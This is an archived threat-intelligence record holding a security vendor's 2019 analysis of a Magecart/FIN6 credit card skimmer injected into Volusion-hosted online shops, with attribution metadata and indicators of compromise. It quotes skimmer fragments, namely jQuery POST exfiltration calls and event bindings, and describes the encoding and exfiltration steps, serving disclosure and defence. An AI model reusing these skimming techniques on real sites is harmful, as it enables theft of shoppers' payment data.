{
	"id": "4b82c4a5-3d50-4c5e-b26f-6fc86d845c7c",
	"created_at": "2026-04-06T00:08:47.928001Z",
	"updated_at": "2026-04-10T03:37:26.294279Z",
	"deleted_at": null,
	"sha1_hash": "f2f120a0bd41748b0d69d8616fdd2a7713d1510e",
	"title": "Magecart Card Skimmers Injected Into Online Shops",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 83879,
	"plain_text": "Magecart Card Skimmers Injected Into Online Shops\r\nBy: Joseph C Chen Oct 10, 2019 Read time: 6 min (1565 words)\r\nPublished: 2019-10-10 · Archived: 2026-04-05 18:28:34 UTC\r\nUpdated on October 14, 2019 at 2:50 AM PST to add a statement from Volusion.\r\nWe discovered that the online credit card skimming attack known as Magecart or E-Skimming was actively operating on 3,126 online shops. Our data shows that the attack started on September 7, 2019. All of the impacted online shops are hosted on the cloud platform of the e-commerce service provider “Volusion,” one of the top e-commerce platforms in the market. This is actually the third time we have identified a card skimmer injected into the cloud platform of an e-commerce provider. Two other businesses were already victimized this year: a campus e-commerce platform and a hotel e-commerce platform. These targets are obviously appealing to cybercriminals since they are connected to multiple — in this most recent case, thousands of — online shops.\r\nWe found malicious code injected into a JavaScript library provided by Volusion to their client shops. The injected code loaded another JavaScript stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. When customers submit their payment information, the skimmer will copy and send the personal information and credit card details to an exfiltration server belonging to the attackers.\r\nOur team contacted Google and they have removed the file. The attack is currently offline. As of publication, Volusion has acknowledged and fixed the issue.\r\nFigure 1. Online credit card skimming attack chain\r\nFigure 2. Country distribution of online shop users who accessed the card skimmer (based on data from the Trend Micro™ Smart Protection Network™ infrastructure)\r\nDuring our investigation, we found that the attackers seemed more experienced and thoughtful than many other skimmer groups. They did not simply add their malicious code at the top or end of a script; instead, they carefully integrated the code into the original script to be part of the execution flow of the program. The code was also written as simply as possible, making it difficult to identify in a big library. Furthermore, they registered the domain of their exfiltration server in a similar style to a legitimate Volusion domain.\r\nConsidering the modus operandi, we believe the attackers are from Magecart Group 6, which has also been identified as the notorious threat actor FIN6. We found similarities in the code used in this attack and the code used in FIN6’s previous attacks on British Airways and Newegg.\r\nAnalysis of the code injection\r\nThe attackers injected their code into a library provided on Volusion’s e-commerce platform for their client shops. The script, described by the comments on the library, includes the necessary code for the pop-out feature of the shop’s navigation menu. It was also used on the shop checkout page.\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/\r\nPage 1 of 5\n\nThe script is located at:\r\nhxxps://[online shop domain]/a/j/vnav.js\r\nThe attackers didn’t just inject their code inside the library. They also integrated their code into the original function of jQueryUI code to be executed with the original execution flow. They created a new object “e.widget.unbridge” right before the original object “e.widget.bridge”, and the malicious code is inside the new object. It’s worth noting that the attackers even wrote their malicious code in a similar coding style to make it look more like a part of the original source code.\r\nThe injected object will create a new script element to load another remote script stored on Google Storage.\r\nFigure 3. Malicious script injected into Volusion’s JavaScript library\r\nFigure 4. Comparison of the original Volusion script (left) and the script with injection (right); the injected malicious code is highlighted\r\nAnalysis of the credit card skimmer\r\nThe loaded remote script is on Google Storage:\r\nhxxps[:]//storage[.]googleapis[.]com/volusionapi/resources.js\r\nMuch of the code inside the script is from the library “js-cookie” version 2.2.1. However, the attackers modified it and integrated a credit card skimmer into the original script. The skimmer binds to the “mousedown” and “touchstart” events of the payment submit button. This means that when victims click (from desktop) or touch (from mobile devices) the submit button, the events will be triggered and the skimmer will be executed.\r\nFigure 5. Comparison of the JavaScript library injected with the skimmer (left) and the original “js-cookie” library (right)\r\nThe skimmer copies the information on the entire payment form: the victim’s name, address, phone number, email address, and credit card details (the number, cardholder name, expiration month, expiration year, and CVV number).\r\nOnce the skimmer has the credit card details, it serializes the copied data into a string and encodes it with Base64. Then, it performs a character permutation on the encoded string to make sure it can’t be directly decoded with Base64 decoding. The data will then be stored in sessionStorage with the key “__utmz_opt_in_out”. The next time the skimmer is loaded (usually on the page after the payment), it will detect if there is data inside sessionStorage and it will use HTTP POST to send the stolen payment information to a remote server at “hxxps[:]//volusion-cdn[.]com/analytics/beacon” for exfiltration.\r\nFigure 6. Main script of the credit card skimmer\r\nNote that the attackers used the domain “volusion-cdn[.]com” for their exfiltration server, a similar name to Volusion’s legitimate server. A possible reason why the attackers stored the skimmer on Google Storage is because Volusion is also running its service on the Google Cloud Platform.\r\nEvidence of Magecart or FIN6\r\nAs previously mentioned, based on the modus operandi, we believe the attackers are from Magecart Group 6, also known as the threat actor FIN6. Here are the connections we considered:\r\nGroup 6 is known to only target top-tier victims, investing in scams where they can receive a big payoff from one attack. This single hack of Volusion allows them to receive credit card data from 3,126 online shops.\r\nFrom the previous skimming attack on the British Airways and Newegg websites, we know that Group 6 tried to register the domains of the exfiltration server to be similar to the victims’ domains. In this case, the domain of the exfiltration server is “volusion-cdn[.]com” — very similar to the valid domain “cdn3[.]volusion[.]com” from Volusion. In addition, the exfiltration domains used during the British Airways, Newegg, and Volusion attacks are all registered through Namecheap.\r\nWe found that the skimmer is an improved version of the previous skimmer used in the attacks on British Airways and Newegg. Both old and current skimmers are written with jQuery, serialize the stolen data, and use the jQuery.ajax function to POST data to a remote server. The older skimmer is much simpler than the current one: it did not encode the stolen data or store the data in sessionStorage before exfiltration.\r\nTarget | Script of data exfiltration request\r\nBritish Airways | jQuery.ajax({type:\"POST\",async:0,url:\"[exfiltration url]\",data:t,dataType:\"application/json\"})\r\nNewegg | jQuery.ajax({type:\"POST\",async:true,url:\"[exfiltration url]\",data:pdati,dataType:\"application/json\"})\r\nVolusion | $.ajax({type: 'POST',url: '[exfiltration url]',dataType: 'application/x-www-form-urlencoded',data: d,complete: function() { window.sessionStorage.removeItem('__utmz_opt_in_out'); }})\r\nIt’s also interesting to see that the skimmer in this attack binds to the “mousedown” and “touchstart” events of the payment submit button. The previous Group 6 skimmer binds to the “mouseup” and “touchend” events. These are different events, but each is the counterpart of the other, and both fire at almost the same moment. It seems that the attackers want to trigger the skimmer at the same point in the interaction, but the current version binds to the opposite event of each pair to avoid detection by heuristic rules.\r\nTarget | Script of event binding\r\nBritish Airways | .bind(\"mouseup touchend\", function(a) {…})\r\nNewegg | .bind(\"mouseup touchend\", function(e) {…})\r\nVolusion | .bind('mousedown touchstart', z)\r\nIt seems that Magecart is continuing to change and experiment with new attack methods, refining its skimmer to evade detection. Sophisticated groups such as these will always try to find new ways to stay undetected in their victims’ systems.\r\nTo defend against this type of threat, website owners should regularly check and strengthen their security with patches and server segregation. Site owners should also employ robust authentication mechanisms, especially for those that store and manage sensitive data. IT and security teams should restrict or disable outdated components and habitually monitor websites and applications for any indicators of suspicious activity that could lead to data exfiltration, execution of unknown scripts, or unauthorized access and modification.\r\nThe following Trend Micro solutions, powered by XGen™ security, protect users and businesses by blocking the scripts and preventing access to the malicious domains:\r\nTrend Micro Security products\r\nSmart Protection Suites and Worry-Free™ Business Security\r\nTrend Micro Network Defense\r\nHybrid Cloud Security\r\nResearcher Marcel Afrahim also published a Medium post on this case.\r\nIndicators of Compromise\r\nIndicator | Attribution | Detection name\r\nvolusion-cdn[.]com | FIN6 exfiltration server domain |\r\nhttps[:]//volusion-cdn[.]com/analytics/beacon | FIN6 exfiltration server URL |\r\nhttps[:]//storage[.]googleapis[.]com/volusionapi/resources.js | FIN6 credit card skimmer URL |\r\n2348433df49e73217969a45726c53441f092c4a6fce57d1d58a6cf79d3976058 | FIN6 credit card skimmer hash | TrojanSpy.JS.MAGECART.C\r\ncee25c699a14a04c6e1b6e6fcd5ce7d4414c9f324b62509a7af14ae5bf749af8 | FIN6 credit card skimmer hash | TrojanSpy.JS.MAGECART.D\r\nd03f18a71ce059a79840a38aad4944426f0524bbd68a7a8fb7003c82996e6533 | FIN6 credit card skimmer hash | TrojanSpy.JS.MAGECART.D\r\nA Volusion spokesperson has added the following statement:\r\n\"Volusion was alerted of a data security incident and can confirm that it was resolved within a few hours of notification. We are coordinating with authorities on this matter, and continue to enhance our systems that detect and prevent unauthorized access to user accounts.\r\nA limited portion of customer information was compromised from a subset of our merchants. This included credit card information, but not other associated personally identifying details. We are not aware of any fraudulent activity connected to this matter.\r\nVolusion has taken action to help secure accounts, and we are continuing to monitor this matter in order to assure the security of our merchants.\"\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/"
	],
	"report_names": [
		"fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops"
	],
	"threat_actors": [
		{
			"id": "12517c87-040a-4627-a3df-86ca95e5c13f",
			"created_at": "2022-10-25T16:07:23.61665Z",
			"updated_at": "2026-04-10T02:00:04.689Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"ATK 88",
				"Camouflage Tempest",
				"FIN6",
				"G0037",
				"Gold Franklin",
				"ITG08",
				"Skeleton Spider",
				"Storm-0538",
				"TAAL",
				"TAG-CR2",
				"White Giant"
			],
			"source_name": "ETDA:FIN6",
			"tools": [
				"AbaddonPOS",
				"Agentemis",
				"AmmyyRAT",
				"Anchor_DNS",
				"BlackPOS",
				"CmdSQL",
				"Cobalt Strike",
				"CobaltStrike",
				"FlawedAmmyy",
				"FrameworkPOS",
				"Grateful POS",
				"JSPSPY",
				"Kaptoxa",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LockerGoga",
				"MMon",
				"Magecart",
				"Meterpreter",
				"Mimikatz",
				"More_eggs",
				"NeverQuest",
				"POSWDS",
				"Reedum",
				"Ryuk",
				"SCRAPMINT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Terra Loader",
				"TerraStealer",
				"Vawtrak",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"cobeacon",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed",
			"created_at": "2023-01-06T13:46:38.814104Z",
			"updated_at": "2026-04-10T02:00:03.110104Z",
			"deleted_at": null,
			"main_name": "MageCart",
			"aliases": [],
			"source_name": "MISPGALAXY:MageCart",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4",
			"created_at": "2023-01-06T13:46:38.269054Z",
			"updated_at": "2026-04-10T02:00:02.90356Z",
			"deleted_at": null,
			"main_name": "APT3",
			"aliases": [
				"GOTHIC PANDA",
				"TG-0110",
				"Buckeye",
				"Group 6",
				"Boyusec",
				"BORON",
				"BRONZE MAYFAIR",
				"Red Sylvan",
				"Brocade Typhoon"
			],
			"source_name": "MISPGALAXY:APT3",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9",
			"created_at": "2022-10-25T15:50:23.317961Z",
			"updated_at": "2026-04-10T02:00:05.280403Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"FIN6",
				"Magecart Group 6",
				"ITG08",
				"Skeleton Spider",
				"TAAL",
				"Camouflage Tempest"
			],
			"source_name": "MITRE:FIN6",
			"tools": [
				"FlawedAmmyy",
				"GrimAgent",
				"FrameworkPOS",
				"More_eggs",
				"Cobalt Strike",
				"Windows Credential Editor",
				"AdFind",
				"PsExec",
				"LockerGoga",
				"Ryuk",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e",
			"created_at": "2024-06-19T02:03:08.052814Z",
			"updated_at": "2026-04-10T02:00:03.659971Z",
			"deleted_at": null,
			"main_name": "GOLD FRANKLIN",
			"aliases": [
				"FIN6 ",
				"ITG08 ",
				"MageCart Group 6 ",
				"Skeleton Spider ",
				"Storm-0538 ",
				"White Giant "
			],
			"source_name": "Secureworks:GOLD FRANKLIN",
			"tools": [
				"FrameWorkPOS",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"PowerSploit",
				"PowerUpSQL",
				"RemCom"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ee3363a4-e807-4f95-97d8-b603c31b9de1",
			"created_at": "2023-01-06T13:46:38.485884Z",
			"updated_at": "2026-04-10T02:00:02.99385Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"SKELETON SPIDER",
				"ITG08",
				"MageCart Group 6",
				"ATK88",
				"TA4557",
				"Storm-0538",
				"White Giant",
				"GOLD FRANKLIN",
				"G0037",
				"Camouflage Tempest"
			],
			"source_name": "MISPGALAXY:FIN6",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "06f622cb-3a78-49cf-9a4c-a6007a69325f",
			"created_at": "2022-10-25T16:07:23.315239Z",
			"updated_at": "2026-04-10T02:00:04.537826Z",
			"deleted_at": null,
			"main_name": "APT 3",
			"aliases": [
				"APT 3",
				"Boron",
				"Brocade Typhoon",
				"Bronze Mayfair",
				"Buckeye",
				"G0022",
				"Gothic Panda",
				"Group 6",
				"Operation Clandestine Fox",
				"Operation Clandestine Fox, Part Deux",
				"Operation Clandestine Wolf",
				"Operation Double Tap",
				"Red Sylvan",
				"TG-0110",
				"UPS Team"
			],
			"source_name": "ETDA:APT 3",
			"tools": [
				"APT3 Keylogger",
				"Agent.dhwf",
				"BKDR_HUPIGON",
				"Backdoor.APT.CookieCutter",
				"Badey",
				"Bemstour",
				"CookieCutter",
				"Destroy RAT",
				"DestroyRAT",
				"DoublePulsar",
				"EXL",
				"EternalBlue",
				"HTran",
				"HUC Packet Transmit Tool",
				"Hupigon",
				"Hupigon RAT",
				"Kaba",
				"Korplug",
				"LaZagne",
				"MFC Huner",
				"OSInfo",
				"Pirpi",
				"PlugX",
				"RedDelta",
				"RemoteCMD",
				"SHOTPUT",
				"Sogu",
				"TIGERPLUG",
				"TTCalc",
				"TVT",
				"Thoper",
				"Xamtrav",
				"remotecmd",
				"shareip",
				"w32times"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434127,
	"ts_updated_at": 1775792246,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f2f120a0bd41748b0d69d8616fdd2a7713d1510e.pdf",
		"text": "https://archive.orkl.eu/f2f120a0bd41748b0d69d8616fdd2a7713d1510e.txt",
		"img": "https://archive.orkl.eu/f2f120a0bd41748b0d69d8616fdd2a7713d1510e.jpg"
	}
}